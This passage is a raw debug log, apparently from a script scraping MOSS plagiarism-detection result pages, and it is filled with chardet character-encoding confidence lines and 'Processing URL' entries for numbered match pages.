23851\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19393\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 23852\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19392\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 23851\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5313621946515541\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match224-top.html\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5440459104324668\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match224-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match224-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match225-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match225-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match225-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match222-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match222-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match222-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16159\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 23950\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16159\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 23937\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16159\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16160\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 23950\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5352421830981732\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16159\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 23937\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5391977486644284\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 23937\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match220-top.html\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 23938\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 23937\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5222430484519112\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match220-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match220-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match226-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match226-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match226-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match227-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match227-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match227-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match228-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match228-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match228-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40778\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25592\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40765\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25579\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40586\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40778\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25592\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40599\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40765\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25579\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25579\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40765\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25580\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40586\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40766\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25579\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40765\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40586\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5411858386248664\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5596648229425181\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match229-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match229-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match229-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match230-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match230-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match230-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match231-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match231-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match231-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 15954\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 18550\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24054\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 15941\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 18537\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 15954\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24041\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 18550\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 15941\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24054\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 15941\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 18537\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24041\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 15942\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 18537\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24041\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 15941\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24042\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 18538\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24041\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 18537\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5499785496954024\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 